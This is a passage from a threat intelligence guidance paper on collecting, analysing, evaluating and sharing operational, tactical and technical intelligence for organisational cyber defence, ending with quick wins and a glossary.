(If the threat intelligence team believes  it’s 99% accurate in all reports and the last three reports have proved to be inaccurate, 
however, there could be issues with the 
team’s faith in its own work.) As for the  product’s impact, the question is how useful the product is in supporting decisions  and how directly it matches the stated 
requirements. Timeliness is simply whether 
the information is delivered to the consumer quickly enough – and in a useable form.
How to Share
Strategic threat intelligence itself is rarely 
shared, as the details could well reveal the organisation’s plans. Generic strategic  
intelligence, meanwhile, is unlikely to be  
of much use to other organisations. 
Instead of sharing strategic intelligence, 
organisations are advised to focus on  
sharing other types of intelligence.  The threat intelligence team at another organisation can then analyse what is  
shared to turn it into strategic intelligence 
relevant to its own business.
Some sensitivity will still be required. For 
example, if your organisation is operating in 
country X and it receives an attack believed 
to be conducted by country X, that could be very useful information for other companies operating in, or intending to operate in, that 
country. Sharing that information will not 
leak strategy but might, if shared incorrectly, lead to other problems: for example,  political issues with the government of the 
country in question. Sharing needs to be 
carefully evaluated to ensure that such  risks are mitigated.
17/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukDefinition
Operational threat intelligence is actionable 
information on specific incoming attacks. 
Ideally, it informs on the nature of the attack, the identity and capability of the attacker – and gives an indication of when the attack 
will take place. It is used to mitigate the  
attack: for example, by removing attack paths or hardening services. 
How to Set Requirements
Consumers of operational threat intelligence 
naturally desire intelligence on all groups that might attack them (with corresponding details of when and how they will attack). However, it is important that organisations focus on operational intelligence that can 
feasibly be obtained, as in-depth information 
on nation-state attackers is not a realistic requirement for private companies. Collecting operational intelligence requires penetrating the attacking groups or their communications, and requirements should 
be limited to groups where this is possible. 
Some organisations might find they are targeted by groups that communicate  relatively openly about their intended 
attacks. These are likely to be ideologically 
motivated groups, rather than financial or espionage-focused groups that typically communicate using far more secure means. 
Requirements should therefore be based 
around producing intelligence on specific groups, supported by consultation with 
the threat intelligence team to ensure the 
requirements are reasonable.Operational Threat  
Intelligence
ATTACKS CAN BE A RESULT OF MEDIA COVERAGE OR EVENTS
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk18/36How to Collect
Collecting operational intelligence in  
traditional domains will include such  
activities as recruiting human sources within groups, and the compromise of the groups’ communications. However, operational 
threat intelligence for private entities is 
necessarily restricted, as the majority of methods of collecting such intelligence would be illegal – or at best immoral – for a private company. Organisations intending  
to conduct monitoring operations are  
advised to take legal advice before doing  so. Monitoring open communications by  groups is more likely to be legal than  
other methods, although organisations  
are nevertheless recommended to seek advice in these cases too.
Activity-Related Attacks
In some cases, recurring attacks could  
be related to real-world events, such as the 
activities of an organisation or those the  organisation is related to, supports, or finances. This is a well-understood  
phenomenon in physical security, where 
– for example – premises are attacked in response to certain triggers, and the same can be true of cyber attacks. Analysts should collect information regarding attacks,  
particularly those that are seen to repeat 
– such as DDoS attacks – and attempt to analyse whether they can be correlated to activities or events. Indicators that the 
attack was about to begin should also be 
sought: for example, social media posts.
Chat Rooms 
Some ideologically motivated groups 
discuss plans in chat rooms. However, 
groups are often aware that these rooms are 
monitored and hence discuss more targeted operations in private chat rooms. It can be difficult – operationally and legally – to 
obtain access to these rooms, meaning that 
many organisations will be limited to the more public rooms that are used to discuss larger-scale attacks: typically those that require a large number of participants,  
such as DDoS.Organisations intending to actively 
collect by, for example, participating  in chat rooms or forums, might wish  
to ensure that such activities are 
conducted discreetly. This could mean using non-attributable IP addresses and preventing the leakage of other 
indicators. 
Organisations should be aware that some 
chat rooms used to discuss wide-ranging attacks are in foreign languages, pushing up 
the cost of collection.
There are threat intelligence vendors that 
sell collected information from both public 
and private rooms, and potential buyers need to ensure that the information being purchased is both legal and relevant to their business. The temptation to have vicarious 
access to ‘closed sources’ can sometimes 
override good judgement when it comes to whether the information is actually useful. 
Social Media
Another means of gleaning operational 
intelligence is to monitor social networks  
for mentions of your organisation in relation 
to a planned attack. For example, Twitter has a well-documented API that can be used to set up a streaming feed
18, where all public 
tweets that match specific search terms  are delivered through the API – and can  
then be consumed and filtered by scripts.  
Alternatively, the feeds of specific  individuals who might tweet threats  against your organisation can, once  
identified, be followed. 
Some vendors offer services that monitor 
social networks for mentions of your  
organisation, with the aim of reporting 
potential attacks.How to Analyse
Collected details of attacks are worth  
scrutinising for signs of activity- or 
event-correlated attacks. In other words, analysts should attempt to identify whether they are part of a pattern related to events 
or activities, or to reported activities in the 
news. It’s important to be aware that attacks could be related not to activities by the organisation itself, but to those of partner organisations or groups/individuals that are 
in some way linked to the organisation. 
Where operational threat intelligence is not 
events-based, it is likely to focus on social 
network posts and chat room conversations. These sources will typically be high  volume, with a great deal of ‘noise’, hence organisations are advised to develop  
scripts that identify messages of  
interest. These scripts will require evaluation and modification until they can produce actionable information. It can also be useful for analysts to hunt through the collected information manually to identify indications 
of attacks, and then develop scripts that 
ensure similar messages would be extracted in future.
Groups sometimes use either codes  
or simply slang that obscures meaning.  In many cases, these involve simple  substitution, where a slang name is used  
for a certain target or type of attack.  
Analysts will want to ensure that they  keep up to date with codes and slang,  and that analytical scripts and wordlists  
are likewise updated.
Another thing to be aware of is that  
individuals tend to change aliases on a  regular basis and analysis needs to take  
that into account. This might require more 
advanced tracking, such as linguistic  analysis, or timeline analysis (where the disappearance of one ‘person’ is swiftly followed by the appearance of another).
Deeper analysis can be effected by  
combining operational threat intelligence with other forms, for example tactical, to  
ensure that there is understanding of 
19/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukgroups’ methodologies and capabilities.  
This can be combined into the operational threat intelligence output (the report or 
notification) to provide more information on 
the expected form and scale of the attack. 
Production and Use
Operational threat intelligence can  
sometimes provide warning of future attacks, such as a planned DDoS at a specific 
time or at the same time as another event. 
This provides the opportunity to ensure  
appropriate defences are in place that will 
both withstand the attack, and monitor/evaluate the nature of the attack in the hope that it will leak information about those behind it. However, intelligence is rarely perfect, so operational threat intelligence 
products should be phrased in such a way  
as to take this into account – with an  appropriate indication of the level of  uncertainty in the product.
Often, there is no significant warning of  
an attack, which might be only minutes away. To deal competently with these  circumstances, organisations would do  well to plan for, and rehearse, reacting to 
operational threat intelligence in short 
timescales. This is likely to involve readily accessible contact details for on-call staff and service providers, with escalation  
paths pre-planned. 
How to Evaluate
Operational threat intelligence is relatively 
easy to evaluate. If the intelligence was able to forecast an attack and, as a result, the attack was partly or wholly mitigated in time, 
then the intelligence was successful. It is 
more likely, however, that incoming attacks were not forecast and it can therefore be useful to conduct some root cause analysis. 
In the majority of cases, the conclusion will 
be that collecting the necessary information to provide forewarning would not have been possible or legal. Where it would have been possible, an investigation of the collection and analysis process will help to identify opportunities for future improvement.  
However, on-going operational threat  
intelligence efforts should be strictly  evaluated as, despite the alluring promise  of such intelligence, in reality there are  
few circumstances where good, actionable 
information is obtained – and resources might be better focused on other types  of threat intelligence.
How to Share
Operational threat intelligence can be 
shared with others if it will provide them with advance warning of attacks. For example,  if – during collection efforts – it’s noticed that the groups under observation are 
planning to target another organisation, 
then that organisation can be alerted to the threat. In such instances, it can prove difficult to find reliable contact details for the appropriate individual to warn, in which case 
CiSP might be a useful route. The individual 
could have their own account on CiSP, or other members of CiSP might well have contact information.
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk20/36Definition
Tactical threat intelligence can be one of the 
most useful forms of intelligence in terms of 
protecting the organisation. It is defined as information that concerns the tactics used by threat groups – including their tools and 
methodologies – and is often referred to as 
Tactics, Techniques, and Procedures (TTPs). 
The aim of tactical threat intelligence is to 
understand how threat actors are likely to 
attack the organisation, and to map this  understanding to the ways in which the attacks can be mitigated or detected. For 
example, the reports that many groups use 
Mimikatz to extract plain text credentials from compromised hosts should inform policies on how administrators perform  remote administration of machines, and 
how accounts are configured on the domain.
Tactical threat intelligence is consumed by 
defenders such as architects, administrators and security staff.
How to Set Requirements
Requirements should focus on  
understanding the tactics used by threat groups, particularly those groups that are believed likely to target the organisation. The requirements might relate to collection 
events, such as “Provide tactical threat  
intelligence to the relevant consumer three days after the release of a report on CiSP”,  or they might be driven by planned  
maintenance, development or purchasing. 
For example, if a domain refresh is planned, the threat intelligence team could be tasked with providing information to the domain administrators and architects on attacks 
seen against domains and how they can  
be mitigated.
 How to Collect
Collection is likely to come from mid-level 
sources, such as reports into attack  campaigns. Tactical threat intelligence requires focusing on the tactics of threats, 
hence collection should focus on sources 
that give insight into these tactics.Attack Group Reports / Campaign  Reports
In the current environment, reports on 
attack campaigns or specific actors are the 
most commonly available sources able to provide details on tactics and tooling, and efforts should be made to collect all that are available. Keeping abreast of documents 
posted on CiSP that have been curated by 
the community is an easy and effective  way to collect the majority of reports.  Alternatively, for those without access to 
CiSP, a Git repository is available at https:/ /
github.com/kbandla/APTnotes; although it should be noted that the content of the repository cannot be guaranteed. 
Malware
Analysing malware samples from groups 
that have attacked the organisation or  
similar organisations can yield information on tactics and tools. Malware can be  collected from feeds (either free or paid-for) that accumulate and distribute malware, 
while a number of websites exist that provide 
malware samples. Alternatively, a number of groups conduct malware analysis and release reports, which can be collected.
Incident Reports
Reports of incidents can be useful in  
informing analysis for tactical threat  intelligence. In some cases, these will be formally published incident reports such as 
appear in forums. However, informal reports 
can also be useful and worthy of collection. These can take the form of conversations with defenders or investigators on the  
nature of attacks and the trends in  
methodologies. 
How to Analyse
All collected sources should then  
be analysed to extract indications of  tactics. White papers and reports can  
be deconstructed to identify the use of  
particular tactics and tools. Specifically, analysts should attempt to identify: Modus Operandi and Exploited Issues
Analysts should attempt to understand how 
threat actors are operating when attacking 
networks. For example, how did the  
attackers initially gain access, how did they escalate privileges, how did they move laterally in the network, how did they gain access to the data they sought, and how did 
they extract the data? For each step in the 
process, attack groups – and even individual attackers – will have patterns of behaviour. Typically, these patterns exploit common 
issues on corporate networks, such as flat 
networks with no segregation, or privileged accounts used to log into workstations. Analysts should seek to identify the issues exploited by attackers and ascertain  whether those issues are present on  their own networks
19.
Where technology refreshes are planned, 
such as new file systems, networks or  
domains, analysts would be wise to attempt to understand common attacks against those systems, to provide guidance to systems administrators and architects in 
making the systems more secure from  
day one.
Tools
Intelligence on the tools used by attackers 
can inform both detection and protection, 
and incident response and protective technologies should aim to identify them as clearly as possible. It is highly unlikely that crude detections such as MD5 sums 
will work, and so detection should focus on 
methods such as well-written YARA rules. Attackers commonly modify open source tools to avoid trivial detection.
Understanding the capabilities of the tools 
in use is also important. Analysis of malware can yield such intelligence, in other words 
the information they might be able to obtain 
– for example, Mimikatz can yield cleartext passwords. Some attack groups have been seen with tooling that exploits MS14-058 
and provides local privilege escalation,  
giving attackers higher privileges on  vulnerable systems
20. Many attackers use Tactical Threat  
Intelligence
21/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukpublically available Remote Access Tools 
(RATs), which is intelligence in itself, while others develop their own. Custom  
RATs should be analysed to identify the 
information that attackers are trying to obtain, and their capabilities in this respect, to support detection and hardening.
Analysis of tools – and different versions  
of those tools – can give an indication  of how advanced a particular actor is
21.  
A remote access toolkit written by a single author in Python, a highly accessible and 
easy-to-learn language, suggests a far less 
capable (and consequently less funded) adversary than one written in efficient C++  (a more challenging language to learn)  
with a complex modular and extensible 
framework. Any change in an attack  group’s tools could indicate a change in  its intentions and resourcing
22. 
Analysts should aim to understand what  
the tool can do, what it might be designed  
to obtain, what the tool says about the skill of its creators and users and, potentially, who wrote it – although this can be difficult to ascertain.
Communications Techniques
Analysts should attempt to understand the 
C2 and data exfiltration channels used by  attackers, and map that information onto 
their organisation to understand whether  
it would be detected or prevented. In  many cases, attackers use HTTP or simple communications methods, but others are more complicated; for example, some 
attackers will use DNS as a command and 
control channel. Details of communications should be extracted from collected sources. 
Forensic Avoidance Strategies
Analysts should be seeking insight into how 
attackers are attempting to avoid detection 
in their tools and actions. Although many 
attackers do not make particular efforts in this regard, a number take significant trouble to avoid or delay detection. Analysts 
are advised to identify the tactics used and 
establish how defences can be adapted to overcome these strategies.
Production and Use
Tactical threat intelligence should provide 
advice to defenders, including network architects, domain administrators,  
system administrators and incident analysts. 
Realistically, organisations need to allocate security budget and resources carefully,  and tactical threat intelligence can help  
this process by identifying the areas in  
which security investment will mitigate 
tactics used by genuine threats. 
The products of intelligence should  
therefore attempt to prioritise fixes for  the organisation’s security and inform  defenders as to how crucial it is to adapt  defences – as well as the likely impact of 
failing to do so. In consequence, providing 
an easily consumable product will  require a degree of understanding of the  organisation’s network plus, potentially, 
liaison with consumers during the  
production process. In some cases, it  might even be appropriate for the threat intelligence team to provide the fixes, such as the registry keys that will need to be 
changed to prevent a certain type of attack. 
A frequently encountered problem is that 
network and server operations staff typically 
run close to full capacity, simply to keep the 
organisation’s infrastructure running to a ‘business as usual’ standard. Buy-in at senior level will therefore be necessary to ensure 
that the threat intelligence product is  
acted on, and that time and resources are committed to implementing the required changes. In some instances, it might  be appropriate to postpone changes to 
coincide with planned future refreshes –  
in which case, increased monitoring is  advisable in the interim period to  identify attacks.
Effective tactical intelligence can also  
aid incident response, as if an attacker’s methods of operating are understood, 
responders can validate their observations 
against what has been seen previously. Where responders are having difficulty following the attack through the network, tactical intelligence can help to indicate 
where the attacker might have gone or what 
they did next.
How to Evaluate 
The evaluation of tactical threat intelligence 
should include an assessment of how well it feeds into the defensive processes, and 
whether the hardening recommended by 
the threat intelligence team has mitigated or 
allowed the detection of particular attacks. 
Where successful attacks have occurred,  
the methodologies of the attackers should be investigated – and a conclusion drawn as to whether the organisation should have been aware of, and mitigated, the attack.  
For example, if the attack used a previously 
unseen or rare technique, then it’s unlikely that collection would have been able to provide intelligence.
How to Share
Sharing tactical threat intelligence helps 
everyone in the community. Individuals 
who do share such intelligence often find it encourages others in the community to come forward with similar reports, providing 
yet more useful threat intelligence. 
When an organisation has been attacked 
(regardless of whether it was successful), it 
is strongly advised that an incident report is 
released. Where possible, this should include information on tooling, tactics and methods of attack. The section ‘Need to Share’ covers 
the ways this can be done while minimising 
any negative impact on the organisation.
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk22/36Definition
Technical threat intelligence comprises 
technical details of an attacker’s assets,  
such as tools, command and control channels, and infrastructure. It differs from tactical threat intelligence in that it focuses 
on specific indicators and rapid distribution 
and response, and therefore has a shorter usable lifespan. The fact that an attacker uses a particular piece of malware would be tactical intelligence, while an indicator 
against a specific compiled example would 
be technical intelligence.
Common examples of technical threat  
intelligence include MD5 sums of malware  or document lures, subject headers of  phishing emails, IP addresses for C2  endpoints or domain names used by C2. 
Ideally, these indicators should come from 
active campaigns that are currently being experienced by other organisations.  By rapidly including these indicators in defensive infrastructure such as firewalls, mail filtering devices and endpoint security 
solutions, organisations can seek to detect 
attackers – either when they first attack,  or in the early stages of an attack. By  searching logs of previously observed  
connections or binaries, historical attacks 
can also be detected.
A challenge frequently reported by  
organisations attempting technical threat 
intelligence is that the sheer quantity of  data can quickly become overwhelming.  In this case, the allocation of resources 
needs to be carefully considered, with 
the organisation perhaps becoming more selective in the data it collects, or instead deciding to build/purchase large analytics platforms to cope with the quantity of  
data. However, it’s important that resource 
allocation and capability development is continually balanced against an evaluation of the benefits of technical threat  intelligence. It might be found that  greater benefits will come from investing  
in other forms of intelligence.There is much commentary in the security 
community as to the usefulness of technical threat intelligence, with some arguing that 
it’s a highly effective way of preventing and 
detecting compromise, while others doubt its usefulness. The latter group likens it to antivirus signatures, since attackers can 
trivially adapt to ensure that their tools  
are not recognised. There is also a concern that large amounts of data sold as technical threat intelligence lack contextual  information, and hence cannot feed  
higher analysis and appraisal of sources.
Technical Threat  
Intelligence
A key failing of technical threat  
intelligence is that it’s relatively simple for an attacker to target a specific 
organisation in a way that ensures no 
pre-existing indicators will have been available. Modified malware, custom network infrastructure and obscured  
C2 communications do not require 
great skill or resources, but still bypass technical threat intelligence efforts.
Technical threat intelligence should be  consumed in an automated fashion and placed into rulesets for network security 
devices and endpoint security solutions.
How to Set Requirements
Setting effective requirements for technical 
threat intelligence can be difficult, as it’s very tempting to allow collection to drive 
the process. Hence requirements are often 
set along the lines of “Process and react to feed X”. This places a lot of faith in ‘feed X’, as it suggests the feed is sufficient to meet higher requirements. Instead, these higher 
requirements should be explicitly set, for 
example, “Identify phishing emails being sent to other companies in our sector and assess whether they are also being sent to 
our staff”. Another requirement might be 
to “Identify IP addresses that are seen in attacks on similar targets to ourselves, and ensure we are not connecting to them”.Requirements should have a retrospective, as well as a current, focus. In other words, where possible, organisations are advised  
to check whether indicators can be  
observed historically; for example, has  the organisation connected to an identified IP address at any time in the past year –  
not just this week.
How to Collect
There are various types of data that can  
be classed as technical threat intelligence, 
with some indicators harder than others 
for attackers to modify in their attempts to defeat signatures
23. This section deals with 
the more commonly sought types.
Indicators are commonly collected from 
feeds (paid-for or free), provided by third parties as a result of their investigations  or derived by an organisation’s internal investigators. For example, once an  
attack has been detected, a good deal of 
investigation can be done online (while ensuring the threat actor is not alerted –  see ‘Staring Into the Abyss’ box-out on p14) 
to derive other indicators of attack
24.
Malware Indicators
As a large proportion of attacks involve  
malware, malware indicators are often 
sought as threat intelligence. The most  commonly offered indicators are MD5 or SHA-1 hashes of binaries believed to be  
suspicious. However, it is trivial for an  
attacker to modify their malware to avoid detection: a single bit changed anywhere  in the binary will result in a different hash, and so many adversaries will use open 
source tools and make subtle modifications 
to change the hashes.
Indicators such as created registry keys  
or file artifacts can be more useful, as they 
are less commonly changed by attackers. 
However, it is still possible for the  adversary to give dropped files a random  
or pseudorandom component in their  
name (for example).
23/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukNotable Free Feeds
CiSP portal, maintained by the UK  
Government, application process  
required. www.cisp.org.uk 
Critical Stack, aggregation of  freely available feeds by a consultancy. https:/ /intel.criticalstack.com
Open Threat Exchange, a forum to 
exchange indicators maintained by 
AlienVault, a SIEM vendor.  https:/ /www.alienvault.com/open-threat-exchangeTrivial Harder
MD5 or 
SHA-1 hashFilename of initial malwareFiles droppedby malwareRegistry keys
created by malwareWell-writtenYARA ruleFigure 5: How hard is it for an attacker to modify malware so that a specific signature is no longer recognised?
Many reports of campaigns will contain  
indicators that can be consumed as  technical threat intelligence. Unfortunately, 
these indicators will often be included in 
PDF reports, hence collection involves copy and pasting the indicators before formatting them correctly. It can be worth contacting 
the report authors to ask whether  
machine-consumable indicators  
are available.
There are a number of freely available and 
commercial feeds of malware indicators.  Before collection, the content of feeds should be evaluated to ensure they  
contain actionable data, as should the  
volume of data – in case collection  overwhelms analysis by virtue of the sheer  quantity of indicators to be consumed. 
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk24/36Network Indicators
A number of different network indicators 
can be collected as technical threat  
intelligence, as malware frequently needs 
to communicate with the attack group. Attackers will operate nodes from which to conduct attacks and will sometimes use the same node for multiple victims. An IP 
address that has been observed by others 
functioning as a C2 node can therefore  be a useful indicator. However, attackers  will often use different IP addresses,  
changing C2 nodes as they are discovered  
or as computers become unavailable. Malware will attempt to connect to a domain name, which can then be pointed to the IP address the attacker is currently using. Where malware is using a hardcoded  domain, this can be a relatively useful  
indicator but it’s quite common for  
malware to use a domain generation  algorithm to avoid the need to connect to the same domain twice. In such cases, a 
domain name has little value as an indicator.
Another potential network indicator  
can be found in C2 communications; for  
example, the ‘Havex’ malware was so called 
as its C2 communications included the term ‘havex’. Such indicators can be more useful to collect, as they require more effort for 
attackers to change.
IP address Domain name Exact URL accessedDetails of command
channel structureFigure 6: How hard is it for an attacker to modify malware communications so that a specific signature type is no longer recognised?
Trivial Harder
As with malware indicators, network  
indicators can be found in white papers  and reports. Again, a number of freely  
available and paid-for feeds exist; one feed 
of particular note is the freely available  daily C2 list from CiSP. 
Email Indicators
A large number of attacks start with  
a phishing or spear phishing attack  containing either a document exploit or  simply malware disguised as something benign, so email indicators can provide 
useful threat intelligence. Attackers will 
often ensure that emails are either targeted or semi-targeted, hence generalist feeds of spam email subjects will be less useful than 
details of phishing emails sent to similar 
organisations. It is worthwhile contacting similar  organisations in an attempt to establish relationships in which the subject headers or 
other indicators of suspicious emails can be 
shared. It is important, however, neither to share nor to receive shared phishing emails themselves, as there is always a risk they will 
be opened. Indicators should be extracted 
and only the indicators shared.
How to Analyse
The analysis of technical threat intelligence 
will almost always be automated or heavily automated. This is because indicators  
will often have a short usable time before  
attackers makes changes, hence rapid  filtering is important. Technical threat  
intelligence is also typically high volume  
and allows little meta-analysis, so is 
well-suited to analysis by machine.
25/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukConversion Between Formats
Technical threat intelligence can be  
transmitted in a number of competing  
formats (STIX and OpenIOC are popular 
choices25), and tools exist to convert  
one format into another for easy  consumption
26. Typically, IOC formats are 
XML-based and readily parsed by scripts into a format suitable for toolsets. Some 
technical threat intelligence is offered in 
formats that are native to specific tools – for example, Snort or Bro IDS – and will not require conversion. In some cases, however, 
indicators might simply be a list of hashes or 
IP addresses that require formatting.
It is therefore recommended that at least 
one member of the threat intelligence team is able to script or program competently,  so that conversion scripts can be written  
for new sources as they become available.
Technical Threat Intelligence Libraries
A concept that has emerged in recent times 
is using a ‘threat intelligence library’ to store 
indicators and seek links between them. 
This approach also allows an organisation  to detect attacks within logs and packet  captures that have been fed in
27. These  
libraries are effectively large repositories that often use so-called ‘big data’  
technologies (such as data warehousing  
and graph analysis) in an attempt to draw links between types of technical threat intelligence, allowing quicker response to 
detected threats, as well as an historical 
record of received IOCs. 
A number of vendors offer paid-for  
products in this area. The Collective  
Intelligence Framework (CIF)
28, meanwhile,  
is an open source project that focuses  primarily on network indicators. It is able  
to consume a variety of sharing formats,  
and allows an organisation to query and output rules in formats suitable for  network appliances
29.Production and Use
The effective ‘product’ of technical threat 
intelligence is the ruleset developed to 
enable network or endpoint tools to detect identified malware. There should be a smooth process for pushing rules to devices 
and software, and a well-established rollback 
protocol. As it’s not possible to vouch for individual feeds, the potential exists for a benign IP or MD5 hash critical to business function to end up on a blacklist. Thus the 
ability to roll back offending rules should  
be well understood.
Malware indicators such as MD5/SHA-1 
hashes can be detected either at network ingress or on the host. Detection at network ingress will require filtering or monitoring of downloaded and emailed files. Bro IDS is 
an open source tool that can facilitate the 
extraction and hashing of binaries from  network traffic
30. Detecting indicators on 
hosts (either hashes or more complex  indicators such as registry keys) is likely  to require endpoint security tools with  
this feature. 
Network indicators such as IP addresses  
and domain names can be placed in  
firewall ‘deny and log’ rules, or as rules  
in network-based IDS products. This  will create alerts for any outbound  connections to those remote endpoints. 
Organisations should be sure that they  
are added to outbound rulesets, as  inexperienced staff occasionally forget that connections will be initiated by malware and hence will appear as outbound connections. 
More complex network indicators, such as 
the internal workings of C2 channels, will require network IDS or network AV products for instances in traffic to be detected.
Email indicators, such as subject  
headers, will require email interception. Organisations using email filtering  services can add indicators to blacklists,  
or a suitably placed Bro IDS instance can  
be used to extract and filter subject lines  or other indicators.Organisations are strongly advised to use technical threat intelligence to search for historical compromise, either by giving 
indicators to incident responders or by using 
similar tools to those used to search for  current compromise. Searching for historical compromise will require records of network 
connections, binaries and emails received. 
How to Evaluate
Technical threat intelligence can be a  
complex endeavour – not to mention  
expensive, if feeds and analytical solutions 
are purchased commercially. It should  therefore be rigorously evaluated:  specifically, the number of prevented  attacks that would not have been  prevented by other means. 
Many organisations appear to focus  
significant proportions of their threat  intelligence effort on this one area.  This can prove inefficient, as by the nature 
of technical threat intelligence collection, 
attackers will always be able to avoid  detection by creating a more custom- targeted attack. Evaluation should therefore consider whether resources would be better 
applied to other types of threat intelligence.
How to Share
Technical indicators should be shared with 
other organisations wherever possible. This can be done through forums such as CiSP, trusted third parties, or via direct sharing. 
Where possible, indicators should be shared 
in a machine-readable format for which  other organisations’ threat intelligence  analysts can write parsers or converters,  
if their tools do not accept that format
31. 
Phishing emails are more usefully shared 
with similar organisations in the same sector, as they are often customised to the sector. It’s therefore recommended that this information is shared with trusted third parties that have specific knowledge of the 
sector, via sector-specific forums, or directly 
with similar organisations. As mentioned previously, the phishing emails themselves should never be shared, only the indicators. 
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk26/36Threat intelligence is at high risk of becoming a buzzword. With so many 
disparate offerings and so much pressure to be ‘doing’ threat intelligence, organisations risk investing large amounts of time and money with little positive effect on security.
However, by taking threat intelligence back to its intelligence roots and 
applying the same strict principles, a far more effective strategy can be devised. As is the case with traditional intelligence, tackling cyber threats demands rigorous planning, execution and evaluation. Only then can  an organisation hope to target its defences effectively, increase its awareness of threats, and improve its response to potential attacks. 
Much can be learnt from studying successful threat intelligence 
programmes and, just as usefully, the common mistakes underlying threat intelligence programmes that fail to deliver genuine business benefits. 
It quickly becomes clear that effective threat intelligence focuses on 
the questions that an organisation wants answered, rather than simply attempting to collect, process, and act on vast quantities of data.  Yet it’s vital to be asking the right questions in the first place. Hence this paper looks in detail at the cycle of setting requirements, collecting and analysing data, turning the results into a consumable product and evaluating the usefulness of that product – which then feeds back into asking ‘better’, more useful questions for the future. 
There is also value in breaking down threat intelligence into subtypes, 
depending on who uses it, where it comes from, and how much business benefit it really offers. By relying too heavily on one sort – or the wrong sort – of threat intelligence, organisations risk wasting effort, while leaving themselves vulnerable to attack.
Resource and budgeting will always be an issue for commercial 
enterprises, and it’s important to realise that the most useful sources of threat intelligence are not necessarily the most expensive. Enormous value can be gained – for example – from sharing threat intelligence  with other organisations, and one-to-one human contacts can be one  of the simplest, yet most effective, sources of actionable information.  This paper therefore looks at the benefits to be gained from sharing  threat intelligence, and how to go about it without exposing the organisation to unnecessary business risk. Summary
27/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukQuick Wins
This section offers examples of some  
productive steps that can be taken with  only a minimum of staff and budget.  
It assumes no specific current security  
infrastructure, such as SIEM tools, IDS  tools or log aggregation and analysis.  It also assumes no current official threat 
intelligence function within the business.
Organisational
•  Identify where threat intelligence  
processes might be taking place  
unofficially, and assess how they could  
be better supported.
Strategic
•  Work with senior management to identify 
current cyber threats as they perceive them. Conduct open source intelligence to determine whether those threats have been realised in the past, and set up  
Google Alerts or RSS Feeds to alert on  
new information.
•  Liaise with peers in organisations in 
the same industry sector to determine 
whether there are other threats that your 
organisation has not yet recognised.
•  With the aid of senior management, create 
a list of all actors (companies, campaign groups, countries, etc.) that would benefit from access to your sensitive data – or from your inability to function effectively.
Operational
•  Prepare a list of names and contact details 
(including out-of-hours details) for the 
people it would be necessary to contact if your organisation received notice of an impending attack.•  If regular or repeat denial-of-service  
attacks are being seen, use Google  to search for your organisation’s  
name, but limited to those dates  
immediately preceding the attacks.  The aim is to determine whether negative coverage is leading to the attacks. If not, 
attempt to identify other factors that 
might be triggering the attacks.
Tactical 
•  Identify organisations that are  
producing incident response reports and 
white papers on threat groups. Set up RSS Feed alerts for new papers released by these organisations.
•  When a paper is released, extract from 
it the key tactical indicators, such as the 
initial mechanism of entry to the network, 
tools or techniques used to move around the network, and mechanisms used  for exfiltration. Carry out a paper  
exercise to determine how susceptible 
your organisation would be to those  techniques, and what changes are  needed to reduce that susceptibility.
•  Consult architects and systems  
administrators to identify planned  refreshes of technologies, environments or key systems. Identify opportunities 
to feed tactical intelligence into these 
refreshes to mitigate attacks at the  design and implementation phase.
Technical
•  Obtain access to the daily C2 list from  
CiSP or other free feeds, and place the  
IP addresses in an ‘alert’ list on the  primary firewall or IDS. Review regularly  to determine whether outbound  connections are being made from within your organisation and – if so – initiate 
incident response.Sharing
•  Identify a forum in which you already 
participate, or in which you can readily  
do so, and discuss threat intelligence with the members of that forum. For example, what they are currently doing in their 
organisation, and what would they like  
to be doing?
•  Identify appropriate peers in similar 
organisations, preferably where there is 
already a relationship and reasonable level of trust. Arrange to meet to discuss your joint perception of existing threats,  
with the aim of developing the trust to 
your mutual benefit.
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk28/36Functions of a Threat  
Intelligence TeamSOC StaffThe Board
Sysadmins / Architects
Incident RespondersFirewall AdminsTHREAT
INTELLIGENCE
TEAMRequirementsReports
Incidents / suspicious 
files and connections
Requests forguidance
Hardeningadvice
IOCs / TTPs
Incident reports and
malware samples
Incoming attacks /Firewall rulesIOCs
29/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukAPI  Application Programming Interface – An interface  
for programs or scripts to interact with automatically (i.e. without a human directly involved), used for 
exchanging information between remote programs
AV Antivirus
Bro IDS  An open source, highly flexible, network-based IDS 
– https:/ /www.bro.org
C2  Command and Control – The mechanism used by malware to communicate with those behind it
CIR   A UK Government-run scheme for companies 
approved to conduct forensic investigations into 
attacks on government computers
CiSP  Cyber Information Sharing Partnership –  
https:/ /www.cert.gov.uk/cisp/
CPNI Centre for the Protection of National Infrastructure
DDoS   Distributed Denial of Service – An attack to render  
a service inoperable, conducted from large numbers  of attacking hosts
DoD United States Department of Defense 
IDS  Intrusion Detection System – Software working at either computer or network level to detect signs of compromise. Typically compares activity to a list of known ‘bad’ activities
IOC  Indicator of Compromise – Typically a technical artifact of malware or malware communications that can indicate a compromise
MD5 hash  A 128 bit representation of an input, where the same 
input always produces the same output, but output (the hash) cannot be reversed to discover input
Mimikatz   An open source tool favoured by many attackers that, among other things, can allow extraction of passwords 
from Windows systems – https:/ /github.com/
gentilkiwi/mimikatz
